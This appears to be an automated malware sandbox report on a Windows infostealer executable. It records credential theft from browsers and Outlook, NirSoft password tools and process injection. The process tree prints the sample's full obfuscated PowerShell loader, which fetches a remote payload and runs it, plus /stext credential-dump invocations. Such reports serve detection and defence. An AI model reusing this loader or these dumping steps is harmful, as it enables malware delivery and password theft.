Analysis
-
max time kernel
148s -
max time network
148s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
-
submitted
22/08/2024, 10:14
General
-
Target
833d78a7e52cbcc21bf4a6843b7ed4130b2d39ae18896370324a7203a705025d.exe
-
Size
483KB
-
MD5
148795d6cfcff607f38bd3815a65a7b6
-
SHA1
a0e7f849720140d61d0bfecffb835fb467ae9faa
-
SHA256
833d78a7e52cbcc21bf4a6843b7ed4130b2d39ae18896370324a7203a705025d
-
SHA512
4e97c7ba04c0b61a1dc3dd0801364048527685b0d2df0e65cdb00670a8a73785d9386e92b51668c54ba6608daaf4f9d29749646fea4a751a9a6def74697c474e
-
SSDEEP
6144:wTz+c6KHYBhDc1RGJdv//NkUn+N5Bkf/0TELRvIZPjbsAOZZBAXccrOT4:wTlrYw1RUh3NFn+N5WfIQIjbs/ZBFT4
Score
9/10
Malware Config
Signatures
-
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Detected Nirsoft tools 7 IoCs
Free utilities often used by attackers which can steal passwords, product keys, etc.
-
NirSoft MailPassView 2 IoCs
Password recovery tool for various email clients
-
NirSoft WebBrowserPassView 3 IoCs
Password recovery tool for various web browsers
-
Blocklisted process makes network request 3 IoCs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
-
Suspicious use of SetThreadContext 3 IoCs
-
Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Modifies registry class 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
-
Suspicious behavior: MapViewOfSection 3 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 18 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\833d78a7e52cbcc21bf4a6843b7ed4130b2d39ae18896370324a7203a705025d.exe"C:\Users\Admin\AppData\Local\Temp\833d78a7e52cbcc21bf4a6843b7ed4130b2d39ae18896370324a7203a705025d.exe"1⤵
- Checks computer location settings
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Trekanterne174.vbs"2⤵
- Blocklisted process makes network request
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "write 'Deaktivering250 Sterilizabilities Desilver Busboy Ischiovertebral Yemen Geotekniske Pagterne Graphoscope preoccupation Lurkers Palliatively Sladrehankenes platybrachycephalous Retshistorie Qualification Kaprendes Undseligheds Orthogonalized Menulinie Prgnantest Larms Antipestilential Blomsterlgene Deaktivering250 Sterilizabilities Desilver Busboy Ischiovertebral Yemen Geotekniske Pagterne Graphoscope preoccupation Lurkers Palliatively Sladrehankenes platybrachycephalous Retshistorie Qualification Kaprendes Undseligheds Orthogonalized Menulinie Prgnantest Larms Antipestilential Blomsterlgene';If (${host}.CurrentCulture) {$Ruefulness='SUBsTR';$Danmarksmestrenes++;}$Ruefulness+='ing';Function semisavage($Semicultivated){$Attesterer=$Semicultivated.Length-$Danmarksmestrenes;For( $Saetningsblok=2;$Saetningsblok -lt $Attesterer;$Saetningsblok+=3){$Deaktivering250+=$Semicultivated.$Ruefulness.'Invoke'( $Saetningsblok, $Danmarksmestrenes);}$Deaktivering250;}function bagstagets($Mirrorise){ . ($Fetichize) ($Mirrorise);}$Nedtrappedes=semisavage 'AfM,eoVezMiiF,lB lAra ,/ S5In.Ko0Af Fe(EuWDei DnredN,oJaw,tsFi .uNSaTR. U1 .0Ha.He0Si; K BaW riTjnMa6 f4ko;Re LaxL.6 K4Be; , urChv.a: ,1Ov2He1,a. M0Re) u SoGBeeL,cBlkKroPr/M.2,o0 ,1 .0 0 E1Ap0 B1St TrFCri,irBeePefr o NxBe/Un1Re2Wi1Mi.Im0Fo ';$Speronaros33=semisavage ' .UAdsCheSurWa- OARigD e OnClt ';$Ischiovertebral=semisavage 'W.hN.t tF.pDusB.:In/ru/,twFoe Kl Occlo Um DsSlpMalHyuHasEn.Unr BuSk/G wMipSt-KoaM,d Sm oiRanA./Chu Bs,fe Ur .s.e/p MSviGdj Ua c.BofInlW.aPr ';$Badeomraaderne=semisavage 'U > L ';$Fetichize=semisavage 'Udi ,e NxNo ';$Chromocyte='Pagterne';$Dysgenical = semisavage 'SceSkcTrhPeo , ,l%DeaRepF,p AdWiaObtSkaAn%.h\,iPDoo usTrhSooTo..rSF gsasB, Mo&Ve& D .eD,cAshhao,i Yht h ';bagstagets (semisavage ' E$K gRelS,o,fbBea ylLe: D.te r.ciSte ,t u=Me(L.c Sm TdSt Ud/SycRu Un$H,D AyGrsCrgCoeTunCaiFecVaaB lA )Gt ');bagstagets (semisavage 'St$StgRilT,oSabtoaSilAn: JB wu FsV,bGloTayR.=Ge$ lIBysr,cKrhSti doAhvMae ErTot eEdbl rRaaQdlHy. LsOopSklKoiA,tTo(,l$M,BN aNudFleKroPemTorUnaSaa Ad .eOvrFenH,e.a)G. ');bagstagets (semisavage 'Un[ ,N FeI t.n.F.S.xeU,rIsvReiAtcIde .PBlo PiWenMatSmM NaU,n aaPeg ,eBerEp]Be:Ha:DrSlaeOpcStuStrRei Ft,iyDePSur ,oLatBloVicsyo FlS, S=,a Hu[ .NBleUnt S.ErSP eAuc LuI.rekiEst iyDrPSpr Bo Dt LoStcT,osulP.TFryKwpPle o]Un:U :hoT RlXas D1.e2 R ');$Ischiovertebral=$Busboy[0];$pvc= (semisavage 'pa$Kog SlLio ,bScas lTh:a.SBiehac.urP euntN iEun.esPi=PeNFreLowUn- UOOvb.ej.telocSatE. ImSL.yS s Pt Me mdo. N reent J.HnWPreI,bsuCA,lD i LeDenVgt');$pvc+=$Deriet[1];bagstagets ($pvc);bagstagets (semisavage 'E.$InSFieFecBarOpe RtEli anExsSi.AdHmiePha rdBle,er Bs,a[Fl$DeSCopAseG rNeoSknFoaD,rReoAssRa3ph3Ur] P=Ka$NoN.oe ,dU t SrAsaplpb,p .eAadSueDesFu ');$Fnernes=semisavage 'ag$p,S Le Sc .r neLft iSun MsBe.muDStoSkwPhnPrlh,oTnaSwdHaFgui MlBee i(,n$UdI,lsEpcBih PiHaoNivM e MrE.tBres.bHvrGaaKnl .,em$ TL,kaForD.mbrs.f) . ';$Larms=$Deriet[0];bagstagets (semisavage 'Ma$S.gInlAloW.b yaE.lKo: SS.oeC lT vOpmStoledEqsSliHagUneMolAisoseL.s .=Ju(umTU eP,sOvt.k-UnP UaD,tRehPr No$siL .a ,rF,mRusH.)El ');while (!$Selvmodsigelses) {bagstagets (semisavage 'Pa$ HgLol.toOfb Pa.ylKr:SeH UuSarFrtHafChuRelti=.u$ ,tE,r gupeeVi ') ;bagstagets $Fnernes;bagstagets (semisavage ' BSRut ,aBrrButWy- aSPelUle,reFlpS. Se4s. ');bagstagets (semisavage ' R$Trg BlUdoAbbIna PlHi:UnS,pe Fl,evTrm.co dUbs eiSig De gl Ms.fe PsBe=Po( NTAleDes at.a- oPNoaBet ThO Da$ChL .aInr,am.osP )Du ') ;bagstagets (semisavage 'Op$DigL,lovoSkbPha Al s: oD,ueT s.picolBevv,e.rrNo=Ro$ShgS,lDeo .bFlaHilF.:P SMetAfeAsr FiBrlodiEuzE,aSabStiPrl ,i ,tReisneTasLe+Un+St%Fo$PeB.guB.sS,bWeo.uyR,.Rec,ooUnuRun ,tSh ') ;$Ischiovertebral=$Busboy[$Desilver];}$Fogedforbud=347549;$Keckling=28042;bagstagets (semisavage 'T,$T gLilB.o Kb Ba UlKo:.dGA r naSlpS,h oCosr c DoEjp ee.e ,o=Op SGcoeKntSa-.hC loOmn bt Ae Mn Nt . r$MoLF,aSkrMemYmsU, ');bagstagets (semisavage 'Gr$H gAflL.onibBeaCylKu:SegMekHos K Ut= . e[TaS ay.os atOveRkmSy.VaC,uoLbnByvReeC,rR,tJ,]A : E: MFspr loTamH BCia Hs reNi6 4 S otHerPoi unVrg a(S.$UdGSurC.aFapTrhMaoB sb cDioSkpT e D)S, ');bagstagets (semisavage 'Fl$Dig ulOro.obR.aMelFi:ooP naTelTolHyipraS.tChiS vSkeNal,tyD Fl=M, M,[TrS nySfsIntR,eMemV .RbT,aeAnxFrtBo.,nE DnAscMoo NdIdiP.n .gAn] i: U: .A,eS uCmaIUnI b.TiGZ e ht RSS.t Cr PiO,nFagSc( P$ArgRekResAn)Sm ');bagstagets (semisavage 'Am$.kg olL o ObVeaTelPh:t.K Lni,i HfShe SlCriPikHyeHa=af$PrPTaaTilTilLoiS aAlthaiOsv ae SlN.yPe.UnsD u bK.s.nt .rMiiNonHogS,(.o$ AFTro ,g eUrdsafE.oZurM.b Su dEx,Di$CoK teCacS.kUblAmi in PgFo) O ');bagstagets $Knifelike;"3⤵
- Blocklisted process makes network request
- Access Token Manipulation: Create Process with Token
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Posho.Sgs && echo t"4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\833d78a7e52cbcc21bf4a6843b7ed4130b2d39ae18896370324a7203a705025d.exeC:\Users\Admin\AppData\Local\Temp\833d78a7e52cbcc21bf4a6843b7ed4130b2d39ae18896370324a7203a705025d.exe /stext "C:\Users\Admin\AppData\Local\Temp\wizklyanftpypvckfzzuxss"2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Users\Admin\AppData\Local\Temp\833d78a7e52cbcc21bf4a6843b7ed4130b2d39ae18896370324a7203a705025d.exeC:\Users\Admin\AppData\Local\Temp\833d78a7e52cbcc21bf4a6843b7ed4130b2d39ae18896370324a7203a705025d.exe /stext "C:\Users\Admin\AppData\Local\Temp\zkedmqtotbhdzbyowkmnixfzsy"2⤵
- Accesses Microsoft Outlook accounts
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\833d78a7e52cbcc21bf4a6843b7ed4130b2d39ae18896370324a7203a705025d.exeC:\Users\Admin\AppData\Local\Temp\833d78a7e52cbcc21bf4a6843b7ed4130b2d39ae18896370324a7203a705025d.exe /stext "C:\Users\Admin\AppData\Local\Temp\jesnmieipjzqchmagvgptkzqtmusf"2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
23KB
MD51603bcb30077161d37f2977db50f5873
SHA143df53981fc58d99cea68279555b4dd98366ed87
SHA256c658636d66ecbaf505b36ded0d6798240fc60b955a47b58473c9f28b4927b22a
SHA51229d8ecd9fc3b7ddfa1d6d3296cc4cc3bdbcb970f68f0aa3ae8c439e23faa9ad92170cdd82af958d01335b2fb9a76ebe5e5a9e5a84c89fca0f5924c938b5fe263
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
4KB
MD58b8277c8f03c24d1f290dbe476e961d2
SHA12e13baf3a4b708277d550dc3dd1e0f99b131f78e
SHA2569af6881f6dbffba028a7a977f4c0a43c764f840332986993ad66de7b816c2f9e
SHA5127367a0236cd0d6cd731caf1ba1f4ea8f851ea1018a9c6b49db6e9d13b2aaba92767774da9169481918e4287021ff5c3a58c3143eaa5e7fe9fa88383208615948
-
Filesize
100KB
-
Filesize
100KB
-
Filesize
100KB
-
Filesize
144KB
-
Filesize
804KB
-
Filesize
144KB
-
Filesize
144KB
-
Filesize
144KB
-
Filesize
408KB
-
Filesize
304KB
-
Filesize
5.6MB
-
Filesize
136KB
-
Filesize
600KB
-
Filesize
104KB
-
Filesize
6.5MB
-
Filesize
120KB
-
Filesize
3.3MB
-
Filesize
6.2MB
-
Filesize
136KB
-
Filesize
408KB
-
Filesize
216KB
-
Filesize
480KB
-
Filesize
480KB
-
Filesize
480KB
-
Filesize
480KB
-
Filesize
480KB
-
Filesize
392KB
-
Filesize
392KB
-
Filesize
392KB
-
Filesize
392KB